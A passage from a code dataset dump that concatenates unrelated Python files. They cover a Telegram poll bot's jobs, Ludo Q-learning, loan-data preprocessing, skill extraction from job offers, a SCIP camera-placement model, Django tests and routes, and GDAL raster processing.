update_poll_messages\n\n\n@job_session_wrapper()\ndef message_update_job(context, session):\n    \"\"\"Update all messages if necessary.\"\"\"\n    try:\n        context.job.enabled = False\n        now = datetime.now()\n        current_time_window = now - timedelta(seconds=now.second % window_size, microseconds=now.microsecond)\n        last_time_window = current_time_window - timedelta(seconds=window_size)\n        one_minute_ago = current_time_window - timedelta(minutes=1)\n\n        
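# Window arithmetic (illustrative): with window_size = 5, a call at 12:00:07.3\n        # floors to the 12:00:05 window, and last_time_window becomes 12:00:00.\n        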
updates = session.query(Update) \\\n            .filter(Update.updated.is_(False)) \\\n            .filter(Update.time_window <= last_time_window) \\\n            .options(joinedload(Update.poll)) \\\n            .order_by(Update.time_window.desc()) \\\n            .all()\n\n        polls_for_refresh = []\n        for update in updates:\n            # It might be that there are multiple active updates\n            # due to the job timeouts and multiple repetitive votes\n            # or long update tasks/telegram timeouts\n            previous_active_updates = session.query(Update) \\\n                .filter(Update.poll == update.poll) \\\n                .filter(Update.updated.is_(False)) \\\n                .all()\n            if len(previous_active_updates) >= 0:\n                for previous_update in previous_active_updates:\n                    previous_update.updated = True\n                    polls_for_refresh.append(previous_update.poll_id)\n                    session.commit()\n\n            # If a more recent update has already been updated, ignore the previous updates\n            elif update.poll_id in polls_for_refresh:\n                session.refresh(update)\n                if update.updated:\n                    continue\n\n            # Get the update amount of the last minute\n            updates_in_last_minute = session.query(func.sum(Update.count)) \\\n                .filter(Update.poll == update.poll) \\\n                .filter(Update.time_window >= one_minute_ago) \\\n                .one_or_none()[0]\n            if updates_in_last_minute is None:\n                updates_in_last_minute = 0\n\n            # Smaller than 100, because we need a little bit of buffer. Timings aren't always perfect\n            if updates_in_last_minute < 100:\n                send_updates(session, context.bot, update.poll, show_warning=True)\n                session.query(Update) \\\n                    .filter(Update.id == update.id) \\\n                    .update({\n                        'count': Update.count + 1,\n                        'updated': True,\n                    })\n\n            # Let's wait a little longer\n            else:\n                pass\n    finally:\n        context.job.enabled = True\n        session.close()\n\n\n@job_session_wrapper()\ndef send_notifications(context, session):\n    \"\"\"Notify the users about the poll being closed soon.\"\"\"\n    polls = session.query(Poll) \\\n        .join(Notification.poll) \\\n        .filter(Poll.next_notification <= datetime.now()) \\\n        .all()\n\n    for poll in polls:\n\n        time_step = poll.due_date - poll.next_notification\n\n        if time_step == timedelta(days=7):\n            send_notifications_for_poll(session, context.bot, poll, 'notification.one_week')\n            poll.next_notification = poll.due_date - timedelta(hours=6)\n\n        # One day remaining reminder\n        elif time_step == timedelta(days=1):\n            send_notifications_for_poll(session, context.bot, poll, 'notification.one_day')\n            poll.next_notification = poll.due_date - timedelta(hours=6)\n\n        # Six hours remaining reminder\n        elif time_step == timedelta(hours=6):\n            send_notifications_for_poll(session, context.bot, poll, 'notification.six_hours')\n            poll.next_notification = poll.due_date\n\n        # Send the closed notification, remove all notifications and close the poll\n        elif poll.due_date == poll.next_notification:\n            poll.closed = True\n            update_poll_messages(session, context.bot, poll)\n\n            send_notifications_for_poll(session, context.bot, poll, 'notification.closed')\n            for notification in poll.notifications:\n                session.delete(notification)\n\n\ndef send_notifications_for_poll(session, bot, poll, message_key):\n    \"\"\"Send the notifications for a single poll depending on the remaining time.\"\"\"\n    locale = poll.locale\n    for notification in poll.notifications:\n        try:\n            # Get the chat and send the notification\n            tg_chat = bot.get_chat(notification.chat_id)\n            tg_chat.send_message(\n                i18n.t(message_key, locale=locale, name=poll.name),\n                parse_mode='markdown',\n                reply_to_message_id=notification.poll_message_id,\n            )\n\n        except BadRequest as e:\n            if e.message == 'Chat not found':\n                session.delete(notification)\n        # Bot was removed from group\n        except Unauthorized:\n            session.delete(notification)\n\n\n@job_session_wrapper()\ndef delete_old_updates(context, session):\n    \"\"\"Delete all unneeded updates.\"\"\"\n    now = datetime.now()\n    time_window = now - timedelta(seconds=now.second % window_size, microseconds=now.microsecond)\n    ten_minutes_ago = time_window - timedelta(minutes=10)\n\n    session.query(Update) \\\n        .filter(Update.time_window <= ten_minutes_ago) \\\n        .delete()\n","sub_path":"pollbot/telegram/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271213649","text":"from pyludo import LudoGame\nfrom pyludo.StandardLudoPlayers import LudoPlayerRandom, LudoPlayerFast, LudoPlayerAggressive, LudoPlayerDefensive\nimport random\nimport time\n\nimport sys\nsys.path.append('pyludo/')\nfrom Qludo import Qludo\nmyplayer = Qludo()\n\nplayers = [\n    myplayer,\n    LudoPlayerRandom(),\n    LudoPlayerRandom(),\n    LudoPlayerRandom()\n    #LudoPlayerFast(),\n    #LudoPlayerAggressive(),\n    #LudoPlayerDefensive(),\n]\n\nmyplayer.learning_rate = 0.02\nmyplayer.discount_rate = 0.01\n\nscores = {}\nfor player in players:\n    scores[player.name] = 0\n\nn = 200\nm = 1000\n\nfor j in range(m):\n    scores = {}\n    for 
player in players:\n        scores[player.name] = 0\n    for i in range(n):\n        random.shuffle(players)\n        ludoGame = LudoGame(players)\n        winner = ludoGame.play_full_game()\n        scores[players[winner].name] += 1\n        print('Game ', i+j*n, ' done')\n        #print(myplayer.Q)\n\n\n\n    myplayer.save_q_stats(filename='ludoStats4.csv', games_played=((j+1)*n), wins=(float(scores['qludo'])))\n    if myplayer.epsilon > 0.01:\n        myplayer.epsilon -= 0.01\n    if myplayer.learning_rate > 0.01:\n        myplayer.learning_rate -= 0.0005\n    if myplayer.discount_rate > 0.01:\n        myplayer.discount_rate -= 0.0005\n\n\nmyplayer.saveQtable('Qtablefile4.csv')\n\nprint('win distribution:', scores)\n","sub_path":"pyludo/examples/ludo4.py","file_name":"ludo4.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30740644","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef get_balanced_class(data):\n    sample_fully_paid = lambda row: np.random.choice([True, False], p=[0.62, 0.38])\n    sample_charged_off = lambda row: np.random.choice([True, False], p=[0.38, 0.62])\n\n    # fully paid\n    fully_paid = data[data['loan_status'] == 'Fully Paid']\n    fully_paid_samples = fully_paid.apply(sample_fully_paid, axis=1)\n    fully_paid = fully_paid[fully_paid_samples]\n\n    # charged off\n    charged_off = data[data['loan_status'] == 'Charged Off']\n    charged_off_samples = charged_off.apply(sample_charged_off, axis=1)\n    charged_off = charged_off[charged_off_samples]\n\n    return pd.concat([fully_paid, charged_off])\n\n\n
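# Example (illustrative): the helper below maps '13.5%' -> 13.5; malformed values\n# fall back to 0.0 via the bare except.\n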
def rate_to_float(rate):\n    try:\n        return float(rate[:-1])\n    except:\n        return 0.0\n\n\ndef crline_dates_to_ts(crline):\n    yr, month = crline.split('-')\n\n    if yr.isdigit():\n        if len(yr) == 1:\n            yr = '200' + yr\n        else:\n            yr = '20' + yr\n    else:\n        yr, month = month, yr\n        if yr == '00':\n            yr = '2000'\n        else:\n            yr = '19' + yr\n\n    return pd.to_datetime(yr + '-' + month)\n\n\ndef emp_length_to_num(emp_length):\n    if emp_length[0].isdigit() and emp_length[1] == ' ':\n        return int(emp_length[0])\n    elif emp_length[0].isdigit() and emp_length[1] == '0':\n        return 10\n    else:\n        return 1\n\n\nclass LendingDataMatrix(object):\n    \"\"\"docstring for LendingDataMatrix\"\"\"\n    def __init__(self, data):\n        self.data = data\n\n    def get_rates(self):\n        self.data['revol_util'] = self.data['revol_util'].apply(rate_to_float)\n        self.data['int_rate'] = self.data['int_rate'].apply(rate_to_float)\n\n    def get_crline_year(self):\n        get_year = lambda date: crline_dates_to_ts(date).year\n        self.data['earliest_cr_line'] = self.data['earliest_cr_line'].apply(get_year)\n\n    def get_emp_length(self):\n        self.data['emp_length'] = self.data['emp_length'].apply(emp_length_to_num)\n\n    def get_text_string(self):\n        get_desc = lambda desc: desc if desc == desc else ''\n        self.data['desc'] = self.data['desc'].apply(get_desc)\n\n        text_cols = ['title', 'emp_title', 'desc']\n        concat_strings = lambda row: ' '.join([str(row[col]) for col in text_cols])\n        self.data['text_string'] = self.data.apply(concat_strings, axis=1)\n        self.data = self.data.drop(text_cols, axis=1)\n\n    def text_to_vec(self, vectorizer=None):\n        if vectorizer:\n            self.vec_desc = vectorizer\n            self.data_text_vec = self.vec_desc.transform(self.data['text_string'])\n        else:\n            max_df = 0.90\n            min_df = 0.05\n            self.vec_desc = CountVectorizer(ngram_range=(1, 2), max_df=max_df,\n                                            min_df=min_df, stop_words='english',\n                                            decode_error='ignore')\n            self.data_text_vec = self.vec_desc.fit_transform(self.data['text_string'])\n\n        self.data_text_vec = pd.DataFrame(self.data_text_vec.todense(), columns=self.vec_desc.vocabulary_)\n        self.data_text_vec = self.data_text_vec.reset_index(drop=True)\n\n    def get_issued_dates(self):\n        self.data['issue_d_month'] = self.data.issue_d.apply(lambda date: date.month)\n        self.data['issue_d_year'] = self.data.issue_d.apply(lambda date: date.year)\n        self.data = self.data.drop('issue_d', axis=1)\n        self.data['term'] = self.data['term'].apply(lambda term: term.days)\n\n    def transform_bankruptcies(self):\n        self.data['pub_rec_bankruptcies'] = self.data['pub_rec_bankruptcies'].apply(lambda val: 0 if val != val else val)\n        self.data['pub_rec_bankruptcies'] = self.data['pub_rec_bankruptcies'].astype('object')\n\n    def get_dummies(self):\n        self.transform_bankruptcies()\n        train_data_objects = self.data.select_dtypes(include=['object']).columns\n        train_data_cats = [col for col in train_data_objects if col not in ['text_string', 'loan_status']]\n        self.data_dummies = pd.get_dummies(self.data.loc[:, train_data_cats])\n        self.data_dummies = self.data_dummies.reset_index(drop=True)\n\n    def get_numeric(self):\n        self.data_numeric = self.data.select_dtypes(exclude=['object'])\n        self.data_numeric = self.data_numeric.reset_index(drop=True)\n\n    def get_data_matrix(self, vectorizer=None):\n        self.get_rates()\n        self.get_crline_year()\n        self.get_emp_length()\n        self.get_text_string()\n        self.text_to_vec(vectorizer=vectorizer)\n        self.get_issued_dates()\n        self.get_dummies()\n        self.get_numeric()\n        self.X = pd.concat([self.data_numeric, self.data_dummies, self.data_text_vec], axis=1)\n\n        return self.X\n","sub_path":"transform_data.py","file_name":"transform_data.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"594415832","text":"# without repetitions soln in py3 for codeeval by steven a dunn\n\nimport sys\n\nf = open(sys.argv[1], 'r')\n\nfor line in f:\n    line = line.strip()\n    new_line = \"\"\n    #print line\n    #print len(line)\n    if len(line) == 1:\n        print(line)\n        continue\n    else:\n        x = 0\n        y = 1\n\n        while y < len(line):\n            #print line[x], line[y]\n            if line[x] != line[y]:\n                new_line += line[x]\n                if y == len(line) - 1:\n                    new_line += line[y]\n            else:\n                if y == len(line) - 1:\n                    new_line += line[x]\n\n            x += 1\n            y += 1\n\n        print(new_line)\n\nf.close()","sub_path":"WithoutRepetitions/py3/nr.py","file_name":"nr.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"307370596","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 15 11:06:04 2018\n\n@author: sylwia\n\"\"\"\nimport numpy as np\nimport re\nimport pandas as pd\n\n\nbulldog_skills = open('Scrappers/Skills/buldog_skills.txt').read().split('\\n')\nskills_hanscraped = open('Scrappers/Skills/additional_skills.txt').read().split(',')\n#languages_wiki = open('Scrappers/Skills/IT_technologies_list.txt').read().split('\\n')\n\n\n#### skills list preprocessing\n# words with '/' will be split into two elements\nadditional_list = [s.split('/') for s in (bulldog_skills + skills_hanscraped) if '/' in s]\nadditional_list = [item.strip() for sublist in additional_list for item in sublist] # flatten it\n# characters in '()' brackets will be treated as a separate word\nadditional_list_2 = [s.replace(')', '').split('(') for s in (bulldog_skills + skills_hanscraped) if ('(' in s)]\nadditional_list_2 = [item.strip() for sublist in additional_list_2 for item in sublist]\n\nskills_list = 
bulldog_skills + additional_list + additional_list_2 + skills_hanscraped\nskills_list = [s.replace('.', ' ').strip() for s in skills_list]\nskills_list = list(set(skills_list)) # to remove the empty string, which was the first one\n\n\n\n#### preprocess offers\noffers = open('Scrappers/Offers/offers_pracuj_pl.txt').read().split('\\n')\nfor ch in ['/', ',', '.', '(', ')']:\n    offers = [o.replace(ch,' ') for o in offers] \n# don't remove stopwords, as it may affect keywords (ruby ON rails, ...)\n\n\n\ndef find_skills(skl_list):\n    skills_pattern = \"[\\\\s]\" + \"[\\\\s]|[\\\\s]\".join(re.escape(skill) for skill in skl_list) +\"[\\\\s]\"\n    r = re.compile(r''+skills_pattern)\n    skills_from_offers = [r.findall(o) for o in offers]\n    return (skills_from_offers)\n\n#################################################\n# 1. Filter all technologies which have only one letter (R, C, ...?)\nskills_one_letter = list(set([s.upper() for s in skills_list if (len(s)==1 and not s.isdigit())]))\nskills_one_letter = ['C', 'R']\nskills_list_one_letter = find_skills(skills_one_letter)\n\n#################################################\n# 2. Filter the rest of the technologies (lower case)\noffers = [o.lower() for o in offers]\nrest_skills = [s.lower() for s in skills_list]\nexcluded = ['i', 'it', '', ' ', 'developer', 'code', 'processing', 'plus', 'pl', 'sp', 'al', 'software'] + [s.lower() for s in skills_one_letter]\nrest_skills = [s for s in rest_skills if (s not in excluded and not s.isdigit())]\nrest_skills_list = find_skills(rest_skills)\n\n#################################################\n# 3. Merge the two skills lists\nmerged_skills_list = [skills_list_one_letter[n] + rest_skills_list[n] for n in range(0,len(rest_skills_list))]\nmerged_skills_list = [list(set(s)) for s in merged_skills_list]\n\n
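# Caveat (illustrative): the whitespace-delimited pattern in find_skills only matches\n# skills surrounded by whitespace, so a skill at the very start or end of an offer text is missed.\n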
Create sparse matrix of values\nmerged_skills_list = [s_list for s_list in merged_skills_list if len(s_list) > 1]\nskills_to_blob = [item.strip() for sublist in merged_skills_list for item in sublist]\nunique_merged_skills = list(set(skills_to_blob))\n\nmerged_skills_df = pd.DataFrame(0, index=np.arange(len(merged_skills_list)), columns = list(set(unique_merged_skills)))\nfor n in range(len(merged_skills_list)):\n for skl in merged_skills_list[n]:\n merged_skills_df.loc[n , skl.strip()] = 1\n\n\nthefile = open('Scrappers/Skills/unique_skills.txt', 'w')\nfor skill in unique_merged_skills:\n thefile.write(\"%s\\n\" % skill)\nthefile.close()\n\nthefile = open('skills_to_blob.txt', 'w')\nfor skill in skills_to_blob:\n thefile.write(\"%s\\n\" % skill)\nthefile.close()\n\n\nthefile = open('Scrappers/Offers/offers_preprocessed.txt', 'w')\nfor skill in merged_skills_list:\n thefile.write(\"%s\\n\" % skill)\nthefile.close()\n\n\nmerged_skills_array = np.array('')\nfor lst in merged_skills_list:\n np.append(merged_skills_array, \" \".join(lst))","sub_path":"IT_skills/extract_skills.py","file_name":"extract_skills.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"573105785","text":"import math\nfrom pyscipopt import Model, quicksum, multidict\nimport time\n\nclass Museum:\n\n def __init__(self, epsilon, file):\n #self.distances = get_distnaces(oeuvres)\n\n with open(file, 'r') as doc:\n content = doc.readlines()\n content = [x.strip() for x in content]\n self.p_dist = int(content[0].split(',')[0])\n self.g_dist = int(content[0].split(',')[1])\n self.p_price = int(content[1].split(',')[0])\n self.g_price = int(content[1].split(',')[1])\n self.oeuvres = []\n for line in content[2:]:\n self.oeuvres.append((int(line.split(',')[0]), int(line.split(',')[1])))\n\n self.id = 0\n self.epsilon = epsilon\n\n self.model = Model(\"Camera\")\n\n self.quadrillage_p = self.get_quadrillage()\n self.quadrillage_g = self.get_quadrillage()\n\n print(\"Epsilon = %.1f\" % self.epsilon)\n print(\"L = %.1f\" % self.L)\n print(\"l = %.1f\" % self.l)\n\n self.model.setObjective(quicksum(self.quadrillage_g[i] for i in self.quadrillage_g.keys()) * self.g_price +\n quicksum(self.quadrillage_p[i] for i in self.quadrillage_p.keys()) * self.p_price, \"minimize\")\n\n def get_quadrillage(self):\n\n quadrillage = {}\n\n\n rank_x = sorted([x[0] for x in self.oeuvres])\n self.max_x = rank_x[-1]\n self.min_x = rank_x[0]\n self.L = abs(self.max_x - self.min_x)\n\n rank_y = sorted([y[1] for y in self.oeuvres])\n self.max_y = rank_y[-1]\n self.min_y = rank_y[0]\n self.l = abs(self.max_y - self.min_y)\n\n x = self.min_x\n y = self.min_y\n\n while x <= self.max_x + self.epsilon:\n y = self.min_y\n while y <= self.max_y + self.epsilon:\n self.id += 1\n quadrillage[x,y] = (self.model.addVar(str(self.id), vtype=\"B\"))\n y += self.epsilon\n x += self.epsilon\n\n return quadrillage\n\n def add_constraints(self):\n for o in self.oeuvres:\n print(\"adding\")\n cam_list = self.fetch_close_cam(o)\n self.model.addCons(quicksum(cam_list[i] for i in range(len(cam_list))) >= 1, \"present camera\")\n\n def solve(self):\n self.model.optimize()\n\n def _xvalues(self, x0, dist):\n\n xvalues = []\n difx = (x0 - dist - self.min_x) % self.epsilon\n x = max(x0 - difx - dist, self.min_x)\n while x <= self.max_x and x <= x0 + dist:\n xvalues.append(x)\n x += self.epsilon\n return xvalues\n\n def _yvalues(self, y0, dist):\n\n yvalues = []\n difx = (y0 - dist - 
self.min_y) % self.epsilon\n y = max(y0 - difx - dist, self.min_y)\n yvalues.append(y)\n while y <= self.max_y and y <= y0 + dist:\n yvalues.append(y)\n y += self.epsilon\n return yvalues\n\n def check_l2_dist(self, a, b, range):\n\n if pow(a[0] - b[0], 2) + pow(a[1] - b[1], 2) <= pow(range,2):\n return True\n return False\n\n def fetch_close_cam(self, o):\n\n camera_list = []\n\n xvalues = self._xvalues(o[0], self.p_dist)\n yvalues = self._yvalues(o[1], self.p_dist)\n for x in xvalues:\n for y in yvalues:\n if self.check_l2_dist(o, (x,y), self.p_dist):\n camera_list.append(self.quadrillage_p[x, y])\n\n\n xvalues = self._xvalues(o[0], self.g_dist)\n yvalues = self._yvalues(o[1], self.g_dist)\n for x in xvalues:\n for y in yvalues:\n if self.check_l2_dist(o, (x,y), self.g_dist):\n camera_list.append(self.quadrillage_g[x, y])\n\n return camera_list\n\n\n def write_result(self, file_name):\n\n result = \"\"\n\n for coord, valeur in self.quadrillage_p.items():\n if self.model.getVal(valeur) == True:\n result += (\"1\" + \",\" + str(int(coord[0])) + \",\" + str(int(coord[1])) + \"\\n\")\n\n for coord, valeur in self.quadrillage_g.items():\n if self.model.getVal(valeur) == True:\n result += (\"2\" + \",\" + str(int(coord[0])) + \",\" + str(int(coord[1])) + \"\\n\")\n\n with open(file_name, \"w\") as result_file:\n result_file.write(result)\n\nif __name__ == '__main__':\n start = time.time()\n museum = Museum(0.5, 'input_9.txt')\n museum.add_constraints()\n stop1 = time.time()\n museum.solve()\n stop2 = time.time()\n print(\"Init time = \", stop1 - start)\n print(\"Solving time = \", stop2 - stop1)\n print(\"Execution time = \", stop2 - start)\n museum.write_result(\"result.txt\")\n","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99519222","text":"from django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom django.urls import reverse\nfrom django.test import tag\n\nfrom selenium import webdriver\n\nfrom accounts.tests.utils import log_user_in\n\nfrom ..models import Product\n\nclass TestFavoriesSelenium(StaticLiveServerTestCase):\n fixtures = ['products']\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.selenium = webdriver.Firefox()\n cls.selenium.implicitly_wait(15)\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super().tearDownClass()\n\n @tag('selenium')\n def test_save(self):\n user = log_user_in(self.selenium, self.live_server_url)\n product = Product.objects.order_by('-nutriscore')[0]\n # assert that the user has no favories saved\n self.assertEqual(len(user.profile.favories.all()), 0)\n find_url = f\"{reverse('substitut:find')}?product_id={product.id}\"\n self.selenium.get(self.live_server_url+find_url)\n fav_url = reverse('substitut:favories')\n self.selenium.find_element_by_xpath(\n f\"//form[@action='{fav_url}']/button[@type='submit']\").click()\n # assert that the user has one favorie saved\n self.assertEqual(len(user.profile.favories.all()), 1)\n","sub_path":"substitut_search/tests/tests_functional.py","file_name":"tests_functional.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"477597162","text":"from django.conf import settings\nfrom django.urls import path\nfrom drf_spectacular.views import SpectacularAPIView, SpectacularRedocView\nfrom rest_framework import routers\n\nfrom 
.views import (\n JobViewSet,\n ObtainTokenView,\n OrgViewSet,\n PlanViewSet,\n ProductCategoryViewSet,\n ProductViewSet,\n ScratchOrgViewSet,\n UserView,\n VersionViewSet,\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(\"jobs\", JobViewSet, basename=\"job\")\nrouter.register(\"products\", ProductViewSet, basename=\"product\")\nrouter.register(\"versions\", VersionViewSet, basename=\"version\")\nrouter.register(\"plans\", PlanViewSet, basename=\"plan\")\nrouter.register(\"categories\", ProductCategoryViewSet, basename=\"productcategory\")\nrouter.register(\"scratch-orgs\", ScratchOrgViewSet, basename=\"scratch-org\")\nurlpatterns = router.urls + [\n path(\"user/\", UserView.as_view(), name=\"user\"),\n path(\"orgs/\", OrgViewSet.as_view(), name=\"org-list\"),\n path(\"token/\", ObtainTokenView.as_view(), name=\"token\"),\n]\n\nif settings.API_DOCS_ENABLED: # pragma: nocover\n urlpatterns += [\n path(\"schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n path(\n \"schema/redoc/\",\n SpectacularRedocView.as_view(url_name=\"schema\"),\n name=\"redoc\",\n ),\n ]\n","sub_path":"metadeploy/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"199578363","text":"import os\r\nimport numpy as np\r\nfrom osgeo import gdal, ogr, osr\r\n\r\n\r\ndef mean_rasters(ras1, ras2, out_file, bound, bound_srs,\r\n no_data, tem_path, **kwargs):\r\n if os.path.exists(out_file):\r\n return\r\n tem_file = os.path.join(tem_path, os.path.splitext(\r\n os.path.basename(out_file))[0] + '.tif')\r\n\r\n ds_in = gdal.Open(ras1)\r\n bound_in = expand_extent(ds_in, bound, bound_srs)\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, outputType=gdal.GDT_Float64,\r\n dstNodata=no_data, outputBounds=bound_in)\r\n ds1 = gdal.Warp(tem_file, ras1, options=option)\r\n ds2 = gdal.Warp('/vsimem/_2.tif', ras2, options=option)\r\n count = min(ds1.RasterCount, ds2.RasterCount)\r\n for c in range(1, 1 + count):\r\n band1 = ds1.GetRasterBand(c)\r\n band2 = ds2.GetRasterBand(c)\r\n arr1 = band1.ReadAsArray()\r\n arr2 = band2.ReadAsArray()\r\n mask = (arr1 != no_data) & (arr2 != no_data)\r\n arr1[mask] = (arr1[mask] + arr2[mask]) / 2\r\n arr1[~mask] = no_data\r\n band1.WriteArray(arr1)\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, outputBounds=bound,\r\n resampleAlg=gdal.GRA_Average, **kwargs,\r\n outputType=gdal.GDT_Float64)\r\n gdal.Warp(out_file, ds1, options=option)\r\n\r\n\r\ndef forest_fraction(ras, out_path, bound, bound_srs,\r\n ids, tem_path, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n tem_file = os.path.join(tem_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n\r\n ds_in = gdal.Open(ras)\r\n bound_in = expand_extent(ds_in, bound, bound_srs)\r\n option = gdal.WarpOptions(multithread=True, creationOptions=creation,\r\n outputBounds=bound_in, dstNodata=2)\r\n ds = gdal.Warp(tem_file, ds_in, options=option)\r\n band = ds.GetRasterBand(1)\r\n cover = ds.ReadAsArray()\r\n is_forest = np.isin(cover, ids).astype(cover.dtype)\r\n band.WriteArray(is_forest)\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, outputBounds=bound,\r\n resampleAlg=gdal.GRA_Average, **kwargs,\r\n 
outputType=gdal.GDT_Float64)\r\n gdal.Warp(out_file, ds, options=option)\r\n\r\n\r\ndef downscaling(ras, out_path, bound, bound_srs, tem_path, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n tem_file = os.path.join(tem_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n\r\n ds_in = gdal.Open(ras)\r\n bound_in = expand_extent(ds_in, bound, bound_srs)\r\n if os.path.splitext(os.path.basename(ras))[1] == '.grib':\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation,\r\n outputBounds=bound_in,\r\n dstSRS=kwargs['dstSRS'])\r\n else:\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation,\r\n outputBounds=bound_in)\r\n\r\n ds_tem = gdal.Warp(tem_file, ds_in, options=option)\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs,\r\n outputBounds=bound,\r\n resampleAlg=gdal.GRA_Average)\r\n # downscaling\r\n gdal.Warp(out_file, ds_tem, options=option)\r\n\r\n\r\ndef deal_LAI(out_path, **kwargs):\r\n LAI_file = os.path.join(out_path, 'leaf_area_index.tif')\r\n if os.path.exists(LAI_file):\r\n return\r\n high_cover_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\high_vegetation_cover.grib')\r\n low_cover_ds = gdal.Open('..\\\\Data\\\\Raw\\\\Time\\\\low_vegetation_cover.grib')\r\n high_LAI_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\leaf_area_index_high_vegetation.grib')\r\n low_LAI_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\leaf_area_index_low_vegetation.grib')\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n LAI_ds = gdal.Warp(LAI_file, high_LAI_ds, options=option)\r\n high_cover_ds = gdal.Warp('/vsimem/_1.tif', high_cover_ds, options=option)\r\n low_cover_ds = gdal.Warp('/vsimem/_2.tif', low_cover_ds, options=option)\r\n high_LAI_ds = gdal.Warp('/vsimem/_3.tif', high_LAI_ds, options=option)\r\n low_LAI_ds = gdal.Warp('/vsimem/_4.tif', low_LAI_ds, options=option)\r\n\r\n # change LAI\r\n col = LAI_ds.RasterCount\r\n for c in range(1, col + 1):\r\n high_cover_band = high_cover_ds.GetRasterBand(c)\r\n low_cover_band = low_cover_ds.GetRasterBand(c)\r\n high_LAI_band = high_LAI_ds.GetRasterBand(c)\r\n low_LAI_band = low_LAI_ds.GetRasterBand(c)\r\n LAI_band = LAI_ds.GetRasterBand(c)\r\n\r\n high_cover = high_cover_band.ReadAsArray()\r\n low_cover = low_cover_band.ReadAsArray()\r\n high_LAI = high_LAI_band.ReadAsArray()\r\n low_LAI = low_LAI_band.ReadAsArray()\r\n\r\n mask = high_cover != high_cover_band.GetNoDataValue()\r\n LAI = np.copy(high_cover)\r\n LAI[mask] = high_cover[mask] * high_LAI[mask] + \\\r\n low_cover[mask] * low_LAI[mask]\r\n\r\n LAI_band.WriteArray(LAI)\r\n\r\n # destroy dataset\r\n LAI_band = None\r\n LAI_ds = None\r\n\r\n\r\ndef deal_net(out_path, **kwargs):\r\n net_file = os.path.join(out_path, 'surface_net_radiation.tif')\r\n if os.path.exists(net_file):\r\n return\r\n\r\n solar_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\surface_net_solar_radiation.grib')\r\n therm_ds = gdal.Open(\r\n '..\\\\Data\\\\Raw\\\\Time\\\\surface_net_thermal_radiation.grib')\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n net_ds = gdal.Warp(net_file, solar_ds, options=option)\r\n solar_ds = gdal.Warp('/vsimem/_1.tif', 
solar_ds, options=option)\r\n therm_ds = gdal.Warp('/vsimem/_2.tif', therm_ds, options=option)\r\n\r\n # change net radiation\r\n col = net_ds.RasterCount\r\n for c in range(1, col + 1):\r\n solar_band = solar_ds.GetRasterBand(c)\r\n therm_band = therm_ds.GetRasterBand(c)\r\n net_band = net_ds.GetRasterBand(c)\r\n\r\n solar = solar_band.ReadAsArray()\r\n therm = therm_band.ReadAsArray()\r\n\r\n mask = solar != solar_band.GetNoDataValue()\r\n net = np.copy(solar)\r\n net[mask] = (solar[mask] + therm[mask]) / 1000000\r\n net_band.WriteArray(net)\r\n\r\n # destroy dataset\r\n net_band = None\r\n net_ds = None\r\n\r\n\r\ndef deal_calc(ras, out_path, plus=None, multi=None, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs)\r\n out_ds = gdal.Warp(out_file, ras, options=option)\r\n for c in range(1, 1 + 